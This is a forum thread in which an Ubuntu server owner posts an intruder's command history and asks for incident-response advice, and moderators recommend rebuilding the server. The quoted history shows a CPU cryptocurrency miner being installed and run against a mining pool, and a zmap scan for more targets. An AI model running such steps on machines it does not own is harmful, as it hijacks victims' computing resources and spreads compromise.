Server Compromised ?

Discussion in 'Technical' started by dipeshmehta, May 16, 2017.

  1. dipeshmehta

    dipeshmehta Member

    I have been running an Ubuntu Server 14.04 LTS, mainly for samba as file server. The server runs fine unattended and so I do not need to login to the server for several days. When I logged into the server today, I found some suspicious activity in command history. While searching web for the commands used, I came to know its something about cryptocurrency / bitcoins etc.

    Following I found in command history:
    cd /usr/local/games
    mkdir miner
    cd miner
    sudo apt-get install -y git automake  pkg-config build-essential libcurl4-openssl-dev
    git clone
    cd cpuminer-multi
    CFLAGS="-march=native" ./configure
    ./minerd -a cryptonight -o stratum+tcp://
    cat /proc/cpuinfo
    ./configure --disable-aes-ni
    ./minerd -a cryptonight -o stratum+tcp://
    tar xvf pooler-cpuminer-2.4.4-linux-x86_64.tar.gz
    ./minerd -a cryptonight
    apt-get install zmap
    zmap -p 2222
    While checking for log, I found all log files are of 0 size in /var/log and datestamp of November 25.
    As precaution, I stopped port forward for port # 22 on my firewall, and changed passwords.
    Kindly guide, what should I do further.
  2. sjau

    sjau Local Meanie Moderator

    If you suspect the server has been compromised, the only thing you can do is set it up anew. You can't trust it anymore until then.
  3. concept21

    concept21 Active Member

    Restore to an older image made before this intrusion happened.
    Then, change ssh login method to Key-only. :cool:
  4. sjau

    sjau Local Meanie Moderator

    if one has an image... but then, that older image might have the same security issue... I still recommend to re-setup everything.
    Last edited: May 20, 2017

Share This Page